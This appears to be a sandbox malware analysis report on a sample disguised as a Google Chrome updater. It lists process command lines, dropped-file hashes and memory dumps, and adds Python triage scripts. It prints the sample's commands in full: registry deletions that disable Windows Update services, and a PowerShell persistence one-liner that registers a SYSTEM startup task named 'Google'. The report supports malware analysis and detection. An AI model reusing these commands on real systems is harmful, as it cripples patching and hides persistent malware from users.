Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
-
C:\Windows\system32\reg.exe (level 3)
Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
-
C:\Windows\system32\reg.exe (level 3)
Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
-
C:\Windows\system32\reg.exe (level 3)
Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe (level 2)
Command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe <#thakcjdi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Google' /tr '''C:\Program Files\Google\chromeupdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\chromeupdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Google' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Google" /t REG_SZ /f /d 'C:\Program Files\Google\chromeupdater.exe' }
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exe (level 2)
Command line: C:\Windows\system32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exe (level 3)
Command line: wmic PATH Win32_VideoController GET Name, VideoProcessor
-
C:\Windows\system32\cmd.exe (level 2)
Command line: C:\Windows\system32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
- Drops file in Program Files directory
-
C:\Windows\system32\conhost.exe (level 2)
Command line: C:\Windows\system32\conhost.exe wwahllplg
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exe (level 2)
Command line: C:\Windows\system32\svchost.exe iulcjduawyyezjwe
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\chromeupdater.exe (level 1)
Command line: "C:\Program Files\Google\chromeupdater.exe"
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Program Files\Google\Libs\g.log
Filesize: 226B
MD5: fdba80d4081c28c65e32fff246dc46cb
SHA1: 74f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256: b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512: b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Program Files\Google\chromeupdater.exe
Filesize: 9.1MB
MD5: 2276c767a4e487885ab8d979c6e66878
SHA1: fd7a9df4d7e68031109f4c7b5de6a0fc424c160e
SHA256: 37d4dbf6abbe35855e329fa4a955cec618781f8f90d223c988fb205304fe2317
SHA512: 4f51cf617bfd006f86d0fa89b2ded7dc7ebdece8715313fd43bd1560e0d58a1e997dda15ba2df1ad140cdd8af4403628ea8f3967439d7774435f8f43ad7abc1b
-
C:\Program Files\Google\chromeupdater.exe
Filesize: 9.1MB
MD5: 2276c767a4e487885ab8d979c6e66878
SHA1: fd7a9df4d7e68031109f4c7b5de6a0fc424c160e
SHA256: 37d4dbf6abbe35855e329fa4a955cec618781f8f90d223c988fb205304fe2317
SHA512: 4f51cf617bfd006f86d0fa89b2ded7dc7ebdece8715313fd43bd1560e0d58a1e997dda15ba2df1ad140cdd8af4403628ea8f3967439d7774435f8f43ad7abc1b
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD522310ad6749d8cc38284aa616efcd100
SHA1440ef4a0a53bfa7c83fe84326a1dff4326dcb515
SHA25655b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf
SHA5122ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD57165d1b9fd1ae46063c336fd4133d20a
SHA17753b95417d8f6a0b31843db2284aaeea8a2f67e
SHA256be3e660b1dce210f9ee874725ccf4c91e8b66ee1af34326fba74f17327a0478d
SHA512eff15ca037dbd9a994eafeb6d3136cb41396698d41184e1c9e53ab7614f8cac65f80cbde60dbcffcb2e328033e66653fbbb5f3c8fc7e61b4e3f74db1e3f307fb
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED.exeFilesize
325KB
MD5038f548b46e0ef89dc476557407e7b4b
SHA118546d1fe05f4aee0313ff7fb805f8a51d65f145
SHA256ff953ecfb1f82e587aa25c29d980f0875c9c9e5b2c9a3e13d87e91a551be9f45
SHA5123dba1ffa622ae1c3b76f12c12e50984ddcfdae288fd234ef93784af2524b8646bdf3e95204ab57f4153779e7766d8bbb66e50e0c68e8adba752056d2655670f3
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED.exeFilesize
325KB
MD5038f548b46e0ef89dc476557407e7b4b
SHA118546d1fe05f4aee0313ff7fb805f8a51d65f145
SHA256ff953ecfb1f82e587aa25c29d980f0875c9c9e5b2c9a3e13d87e91a551be9f45
SHA5123dba1ffa622ae1c3b76f12c12e50984ddcfdae288fd234ef93784af2524b8646bdf3e95204ab57f4153779e7766d8bbb66e50e0c68e8adba752056d2655670f3
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED2.exeFilesize
7.5MB
MD5f49731a7439fd1c0bd9b1ca479372985
SHA126c9aec52acacb8c2573577b721ed1cb74cfdb30
SHA2563b6661895ec7cf5f8275093791322e6c05f28583a49ffc88e0e28fe6b1450972
SHA5128887062cd5505a5073f2b819d08041c0151c054955c1912bf6ff450c03f08e29c40ef0ff135546c73793a59b5e11eaabd7956b1bd3f3f94f4fbc30ab0b73816a
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exeFilesize
9.1MB
MD5223ce6bb95cc6072b3c08cdcdf6b2944
SHA1a55afd57e0862347574680bda2ea42ccb6c31bce
SHA25639cc2423c2cd157014637802833c3b70f9b6cc5ff3e3247b15949eded3cb8d62
SHA512a34ecf9dc5dae22f37d3697a5c4050261ca98f22f3f88108c9c63f02911fe64ed1be9b8608211b8440cb19fd5dbac423d1bbe1c5e70f2e31f0043b8ebbd4daa6
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exeFilesize
9.1MB
MD5223ce6bb95cc6072b3c08cdcdf6b2944
SHA1a55afd57e0862347574680bda2ea42ccb6c31bce
SHA25639cc2423c2cd157014637802833c3b70f9b6cc5ff3e3247b15949eded3cb8d62
SHA512a34ecf9dc5dae22f37d3697a5c4050261ca98f22f3f88108c9c63f02911fe64ed1be9b8608211b8440cb19fd5dbac423d1bbe1c5e70f2e31f0043b8ebbd4daa6
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED4.exeFilesize
68KB
MD5953f7e1cc05d1c62e733325e535dfec2
SHA1b15b41799c491f1a9dac97189fd2a7373c9a7cbe
SHA256906de8044ba266774e17f3fe0683aed2ccf60e2f73d2f78eebf38f636f0ce74e
SHA5122406f2cf52706dba8d182b061efd3cb15ce533ea8eae8abcdf318a051f46951219385d655d30bf2920513bb66a6c4b02698fd575f2cf32b7928de7d8f36b79b9
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED4.exeFilesize
68KB
MD5953f7e1cc05d1c62e733325e535dfec2
SHA1b15b41799c491f1a9dac97189fd2a7373c9a7cbe
SHA256906de8044ba266774e17f3fe0683aed2ccf60e2f73d2f78eebf38f636f0ce74e
SHA5122406f2cf52706dba8d182b061efd3cb15ce533ea8eae8abcdf318a051f46951219385d655d30bf2920513bb66a6c4b02698fd575f2cf32b7928de7d8f36b79b9
-
C:\Users\Admin\AppData\Roaming\Microsoft\WindowsSecurityHealthService\Windows Security Health Service.exeFilesize
68KB
MD5953f7e1cc05d1c62e733325e535dfec2
SHA1b15b41799c491f1a9dac97189fd2a7373c9a7cbe
SHA256906de8044ba266774e17f3fe0683aed2ccf60e2f73d2f78eebf38f636f0ce74e
SHA5122406f2cf52706dba8d182b061efd3cb15ce533ea8eae8abcdf318a051f46951219385d655d30bf2920513bb66a6c4b02698fd575f2cf32b7928de7d8f36b79b9
-
C:\Users\Admin\AppData\Roaming\Microsoft\WindowsSecurityHealthService\Windows Security Health Service.exeFilesize
68KB
MD5953f7e1cc05d1c62e733325e535dfec2
SHA1b15b41799c491f1a9dac97189fd2a7373c9a7cbe
SHA256906de8044ba266774e17f3fe0683aed2ccf60e2f73d2f78eebf38f636f0ce74e
SHA5122406f2cf52706dba8d182b061efd3cb15ce533ea8eae8abcdf318a051f46951219385d655d30bf2920513bb66a6c4b02698fd575f2cf32b7928de7d8f36b79b9
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD57aa727c416bcf0287c76aec520a41a23
SHA15f770c8fb6be09cf11d7ee8e2e320278a167172f
SHA25639f607fbb5bfcfc5c394645fd9b718de1c714b363b17a4dd992ef2084eda8e53
SHA512ce032701727b0c1e5945e1fde4e4dbc8e48be60dba71377e3741b80f74951c023a4d8e633d1ff1087054e5aba2764d9af97cc3ff6529a98be1907834ec3a78e6
-
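The dropped-file table above is easier to act on once it is grouped by content rather than read entry by entry. The Python below is an added example, not part of the sandbox report or of the sample: it parses the table in the flattened form the report uses (path fused with "Filesize", a size line, then label-prefixed hashes), groups entries by SHA256 to find the same bytes written under more than one name, flags writes to the hosts file, to Program Files and to the roaming profile, and notes executables that share a size but not a hash. The embedded excerpt is constructed from the report's own entries (SHA1 and SHA512 lines omitted); the path rules in classify_path are the editor's assumptions, not report output.

```python
"""Triage of a sandbox report's Downloads (dropped files) table.

Added example, not part of the report or of the sample. It parses the table
in the flattened form the report uses (path fused with 'Filesize', a size
line, then label-prefixed hashes) and flags what an analyst checks first:
the same content written under several names, writes to system paths, and
executables placed where installed products live. The excerpt below is
constructed from the report's own entries (SHA1/SHA512 lines omitted); the
path rules in classify_path are assumptions, not report output.
"""
import re
from collections import defaultdict

SAMPLE = """\
C:\\Program Files\\Google\\Libs\\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
-
C:\\Program Files\\Google\\chromeupdater.exeFilesize
9.1MB
MD52276c767a4e487885ab8d979c6e66878
SHA25637d4dbf6abbe35855e329fa4a955cec618781f8f90d223c988fb205304fe2317
-
C:\\Users\\Admin\\AppData\\Local\\Temp\\UNNAMED3.exeFilesize
9.1MB
MD5223ce6bb95cc6072b3c08cdcdf6b2944
SHA25639cc2423c2cd157014637802833c3b70f9b6cc5ff3e3247b15949eded3cb8d62
-
C:\\Users\\Admin\\AppData\\Local\\Temp\\UNNAMED4.exeFilesize
68KB
MD5953f7e1cc05d1c62e733325e535dfec2
SHA256906de8044ba266774e17f3fe0683aed2ccf60e2f73d2f78eebf38f636f0ce74e
-
C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\WindowsSecurityHealthService\\Windows Security Health Service.exeFilesize
68KB
MD5953f7e1cc05d1c62e733325e535dfec2
SHA256906de8044ba266774e17f3fe0683aed2ccf60e2f73d2f78eebf38f636f0ce74e
-
C:\\Windows\\system32\\drivers\\etc\\hostsFilesize
2KB
MD57aa727c416bcf0287c76aec520a41a23
SHA25639f607fbb5bfcfc5c394645fd9b718de1c714b363b17a4dd992ef2084eda8e53
-
"""

HASH_LABELS = ("SHA512", "SHA256", "SHA1", "MD5")  # longest first
HEX = re.compile(r"[0-9a-fA-F]+")


def parse_downloads(text):
    """Return one dict per entry: path, size, and whichever hashes are present."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "-":
            continue
        if line.endswith("Filesize"):              # a new entry starts here
            current = {"path": line[: -len("Filesize")]}
            entries.append(current)
        elif current is None:
            continue
        else:
            for label in HASH_LABELS:
                if line.startswith(label) and HEX.fullmatch(line[len(label):]):
                    current[label.lower()] = line[len(label):].lower()
                    break
            else:
                current["size"] = line             # the only unlabeled line is the size
    return entries


def classify_path(path):
    """Assumed analyst heuristics on where a dropped file landed."""
    p = path.lower()
    is_exe = p.endswith(".exe")
    out = []
    if p.endswith("\\drivers\\etc\\hosts"):
        out.append("hosts file replaced (name resolution can be redirected or blocked)")
    if is_exe and p.startswith("c:\\program files"):
        out.append("executable planted in Program Files (masquerades as an installed product)")
    if is_exe and "\\appdata\\roaming\\" in p:
        out.append("executable staged under the roaming profile (common persistence location)")
    return out


def triage_downloads(text):
    entries = parse_downloads(text)
    report = {"entries": len(entries), "findings": [], "copies": {}, "same_size": {}}
    by_hash, by_size = defaultdict(set), defaultdict(set)
    for e in entries:
        report["findings"] += [f"{e['path']}: {f}" for f in classify_path(e["path"])]
        if "sha256" in e:
            by_hash[e["sha256"]].add(e["path"])
        if e["path"].lower().endswith(".exe"):
            by_size[e.get("size")].add(e["path"])
    # Identical content under more than one name: a staged copy, often to a persistence path.
    report["copies"] = {h: sorted(p) for h, p in by_hash.items() if len(p) > 1}
    # Same size but different hash between executables: worth a closer diff, not proof of anything.
    for size, paths in by_size.items():
        digests = {e.get("sha256") for e in entries if e["path"] in paths}
        if len(paths) > 1 and len(digests) > 1:
            report["same_size"][size] = sorted(paths)
    return report


if __name__ == "__main__":
    import json
    print(json.dumps(triage_downloads(SAMPLE), indent=2))
```

Run against the excerpt, the 68KB file with SHA256 906de804… comes out as one item under "copies" with two paths (Temp\UNNAMED4.exe and the Windows-sounding name under Roaming), chromeupdater.exe and UNNAMED3.exe appear together under "same_size" because they share 9.1MB but not a hash, and the hosts, Program Files and Roaming findings are the three path flags.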
memory/208-196-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmp
Filesize
10.8MB
-
memory/208-197-0x000001A1AF3F0000-0x000001A1AF3FA000-memory.dmp
Filesize
40KB
-
memory/208-198-0x000001A1AF560000-0x000001A1AF57C000-memory.dmp
Filesize
112KB
-
memory/208-199-0x000001A1AF540000-0x000001A1AF54A000-memory.dmp
Filesize
40KB
-
memory/208-200-0x000001A1AF5A0000-0x000001A1AF5BA000-memory.dmp
Filesize
104KB
-
memory/208-204-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmp
Filesize
10.8MB
-
memory/208-203-0x000001A1AF590000-0x000001A1AF59A000-memory.dmp
Filesize
40KB
-
memory/208-202-0x000001A1AF580000-0x000001A1AF586000-memory.dmp
Filesize
24KB
-
memory/208-195-0x000001A1AF310000-0x000001A1AF32C000-memory.dmp
Filesize
112KB
-
memory/208-201-0x000001A1AF550000-0x000001A1AF558000-memory.dmp
Filesize
32KB
-
memory/320-143-0x0000028071D30000-0x0000028071D52000-memory.dmp
Filesize
136KB
-
memory/320-138-0x0000000000000000-mapping.dmp
-
memory/320-161-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmp
Filesize
10.8MB
-
memory/320-153-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmp
Filesize
10.8MB
-
memory/400-178-0x0000000000000000-mapping.dmp
-
memory/1016-175-0x0000000000000000-mapping.dmp
-
memory/1104-174-0x0000000000000000-mapping.dmp
-
memory/1388-171-0x0000000000000000-mapping.dmp
-
memory/1472-228-0x00007FF6DFD30000-0x00007FF6E0524000-memory.dmp
Filesize
8.0MB
-
memory/1472-227-0x0000025B39F50000-0x0000025B39F70000-memory.dmp
Filesize
128KB
-
memory/1472-229-0x0000025B3A200000-0x0000025B3A240000-memory.dmp
Filesize
256KB
-
memory/1472-230-0x00007FF6DFD30000-0x00007FF6E0524000-memory.dmp
Filesize
8.0MB
-
memory/1472-231-0x0000025B39FD0000-0x0000025B39FF0000-memory.dmp
Filesize
128KB
-
memory/1472-224-0x00007FF6E0522120-mapping.dmp
-
memory/1624-182-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmp
Filesize
10.8MB
-
memory/1624-181-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmp
Filesize
10.8MB
-
memory/1680-187-0x0000000000000000-mapping.dmp
-
memory/1756-206-0x0000000000000000-mapping.dmp
-
memory/1796-139-0x0000000000000000-mapping.dmp
-
memory/1876-142-0x0000000000000000-mapping.dmp
-
memory/2080-135-0x0000000000190000-0x0000000001296000-memory.dmp
Filesize
17.0MB
-
memory/2080-137-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmp
Filesize
10.8MB
-
memory/2080-136-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmp
Filesize
10.8MB
-
memory/2080-152-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmp
Filesize
10.8MB
-
memory/2256-160-0x0000000000000000-mapping.dmp
-
memory/2256-165-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmp
Filesize
10.8MB
-
memory/2256-166-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmp
Filesize
10.8MB
-
memory/2328-216-0x0000000000000000-mapping.dmp
-
memory/2492-155-0x00007FF79FF00000-0x00007FF7A0EDC000-memory.dmp
Filesize
15.9MB
-
memory/2492-145-0x0000000000000000-mapping.dmp
-
memory/2492-183-0x00007FF79FF00000-0x00007FF7A0EDC000-memory.dmp
Filesize
15.9MB
-
memory/2492-159-0x00007FF79FF00000-0x00007FF7A0EDC000-memory.dmp
Filesize
15.9MB
-
memory/2564-164-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmp
Filesize
10.8MB
-
memory/2564-151-0x0000000000AB0000-0x0000000000AC8000-memory.dmp
Filesize
96KB
-
memory/2564-154-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmp
Filesize
10.8MB
-
memory/2564-148-0x0000000000000000-mapping.dmp
-
memory/2792-189-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmp
Filesize
10.8MB
-
memory/2792-186-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmp
Filesize
10.8MB
-
memory/3152-173-0x0000000000000000-mapping.dmp
-
memory/3304-221-0x00000235D2CC9000-0x00000235D2CCF000-memory.dmp
Filesize
24KB
-
memory/3304-220-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmp
Filesize
10.8MB
-
memory/3304-219-0x00000235D2CC9000-0x00000235D2CCF000-memory.dmp
Filesize
24KB
-
memory/3304-218-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmp
Filesize
10.8MB
-
memory/3320-215-0x0000000000000000-mapping.dmp
-
memory/3668-226-0x00007FF7EEFD0000-0x00007FF7EFFAC000-memory.dmp
Filesize
15.9MB
-
memory/3668-191-0x00007FF7EEFD0000-0x00007FF7EFFAC000-memory.dmp
Filesize
15.9MB
-
memory/3668-194-0x00007FF7EEFD0000-0x00007FF7EFFAC000-memory.dmp
Filesize
15.9MB
-
memory/3884-212-0x0000000000000000-mapping.dmp
-
memory/4060-176-0x0000000000000000-mapping.dmp
-
memory/4116-213-0x0000000000000000-mapping.dmp
-
memory/4280-170-0x0000000000000000-mapping.dmp
-
memory/4288-156-0x0000000000000000-mapping.dmp
-
memory/4368-211-0x0000000000000000-mapping.dmp
-
memory/4380-177-0x0000000000000000-mapping.dmp
-
memory/4400-223-0x0000000000000000-mapping.dmp
-
memory/4472-180-0x0000000000000000-mapping.dmp
-
memory/4668-184-0x0000000000000000-mapping.dmp
-
memory/4808-179-0x0000000000000000-mapping.dmp
-
memory/4836-222-0x00007FF729F014E0-mapping.dmp
-
memory/4864-214-0x0000000000000000-mapping.dmp
-
memory/4868-217-0x0000000000000000-mapping.dmp
-
memory/4880-169-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmp
Filesize
10.8MB
-
memory/4908-209-0x0000000000000000-mapping.dmp
-
memory/5100-210-0x0000000000000000-mapping.dmp
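The memory-dump list above carries more than file names: each region dump encodes its start and end address, so the listed size can be checked against the range, regions that recur at the identical address in many processes can be separated from per-process ones, and a mapping dump taken at a non-zero address can be placed inside (or outside) the regions dumped for the same process. The Python below is an added example, not part of the sandbox report: it parses the report's naming scheme (memory/<pid>-<n>-0x<start>-0x<end>-memory.dmp followed by a size line, and memory/<pid>-<n>-0x<address>-mapping.dmp) and answers those three questions. The embedded excerpt is constructed from the report's own lines; the 2% size tolerance is an assumption. A range at the identical address in several PIDs, like 0x00007FFB3D400000-0x00007FFB3DEC1000 which the report shows in nine processes, is consistent with a system DLL sharing its per-boot ASLR base and is not where sample-specific code would be looked for.

```python
"""Triage of a sandbox report's memory-dump list.

Added example, not part of the report. It parses the report's dump names,
  memory/<pid>-<n>-0x<start>-0x<end>-memory.dmp  (followed by a size line)
  memory/<pid>-<n>-0x<address>-mapping.dmp
checks the listed size against the address range, finds regions mapped at
the same address in several processes, picks each process's largest region,
and tells whether a mapping dump's address lies inside one of that process's
dumped regions. The excerpt is constructed from the report's own lines; the
2% size tolerance is an assumption.
"""
import re
from collections import defaultdict

SAMPLE = """\
memory/208-196-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmpFilesize
10.8MB
-
memory/208-197-0x000001A1AF3F0000-0x000001A1AF3FA000-memory.dmpFilesize
40KB
-
memory/320-138-0x0000000000000000-mapping.dmp
-
memory/320-161-0x00007FFB3D400000-0x00007FFB3DEC1000-memory.dmpFilesize
10.8MB
-
memory/1472-228-0x00007FF6DFD30000-0x00007FF6E0524000-memory.dmpFilesize
8.0MB
-
memory/1472-224-0x00007FF6E0522120-mapping.dmp
-
memory/2492-155-0x00007FF79FF00000-0x00007FF7A0EDC000-memory.dmpFilesize
15.9MB
-
memory/3668-191-0x00007FF7EEFD0000-0x00007FF7EFFAC000-memory.dmpFilesize
15.9MB
-
memory/4836-222-0x00007FF729F014E0-mapping.dmp
-
"""

DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<a>[0-9A-Fa-f]+)"
    r"(?:-0x(?P<b>[0-9A-Fa-f]+))?-(?P<kind>memory|mapping)\.dmp"
)
UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}


def parse_size(text):
    """'10.8MB' -> bytes (binary units; the report rounds to one decimal)."""
    m = re.fullmatch(r"([\d.]+)([KMG]?B)", text or "")
    return float(m[1]) * UNITS[m[2]] if m else None


def parse_dumps(text):
    """One dict per dump line; region dumps also carry start/end/size_bytes/size_ok."""
    lines = [ln.strip() for ln in text.splitlines()]
    dumps = []
    for i, line in enumerate(lines):
        m = DUMP_RE.match(line)
        if not m:
            continue
        d = {"pid": int(m["pid"]), "seq": int(m["seq"]), "kind": m["kind"]}
        if m["kind"] == "memory":
            d["start"], d["end"] = int(m["a"], 16), int(m["b"], 16)
            d["size_bytes"] = d["end"] - d["start"]
            reported = parse_size(lines[i + 1]) if i + 1 < len(lines) else None
            # The listed size should agree with the range; a mismatch means a mis-parsed entry.
            d["size_ok"] = reported is not None and abs(reported - d["size_bytes"]) <= 0.02 * d["size_bytes"]
        else:
            d["addr"] = int(m["a"], 16)
        dumps.append(d)
    return dumps


def fmt(start, end):
    return f"0x{start:016X}-0x{end:016X}"


def triage_dumps(text):
    dumps = parse_dumps(text)
    regions = [d for d in dumps if d["kind"] == "memory"]
    by_region = defaultdict(set)
    for d in regions:
        by_region[(d["start"], d["end"])].add(d["pid"])
    # A range at the identical address in several PIDs is consistent with a system DLL
    # sharing its per-boot ASLR base, not with sample-specific code.
    shared = {fmt(s, e): sorted(p) for (s, e), p in by_region.items() if len(p) > 1}
    largest = {}
    for d in regions:
        if d["pid"] not in largest or d["size_bytes"] > largest[d["pid"]]["size_bytes"]:
            largest[d["pid"]] = d
    largest = {pid: fmt(d["start"], d["end"]) for pid, d in largest.items()}
    # Non-zero mapping addresses: name the dumped region of the same PID that contains them, if any.
    inside = {}
    for d in dumps:
        if d["kind"] == "mapping" and d["addr"]:
            hits = [r for r in regions if r["pid"] == d["pid"] and r["start"] <= d["addr"] < r["end"]]
            inside[d["pid"]] = fmt(hits[0]["start"], hits[0]["end"]) if hits else None
    return {"shared_regions": shared, "largest_region": largest, "mapping_inside_region": inside,
            "size_mismatches": [fmt(r["start"], r["end"]) for r in regions if not r["size_ok"]]}


if __name__ == "__main__":
    import json
    print(json.dumps(triage_dumps(SAMPLE), indent=2))
```

On the excerpt, every listed size agrees with its address range (0x00007FFB3D400000-0x00007FFB3DEC1000 is 0xAC1000 bytes, which rounds to the report's 10.8MB), that range is the one shared between PIDs 208 and 320, and the mapping dump of PID 1472 at 0x00007FF6E0522120 falls inside that process's 8.0MB region, while PID 4836's mapping dump has no region listed for it at all.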